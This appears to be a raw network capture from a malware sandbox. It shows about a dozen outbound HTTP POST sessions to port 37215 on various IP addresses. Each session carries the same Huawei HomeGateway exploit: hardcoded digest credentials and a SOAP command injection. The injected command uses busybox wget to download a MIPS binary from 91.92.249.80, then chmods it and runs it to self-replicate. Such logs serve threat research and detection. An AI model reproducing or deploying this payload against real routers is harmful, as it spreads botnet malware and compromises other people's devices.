                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          898192.168.2.2336282157.71.85.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266289949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          899192.168.2.235745041.189.233.17837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266299963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          900192.168.2.2345616197.43.111.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266421080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          901192.168.2.234352441.223.41.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266422987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          902192.168.2.2348176157.228.45.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266444921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          903192.168.2.2352682202.140.99.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266448021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          904192.168.2.2341910197.255.122.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266463995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          905192.168.2.2349412197.244.63.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266479015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          906192.168.2.234646877.218.127.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266483068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          907192.168.2.236079241.74.63.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266503096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          908192.168.2.2354890157.103.111.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266516924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
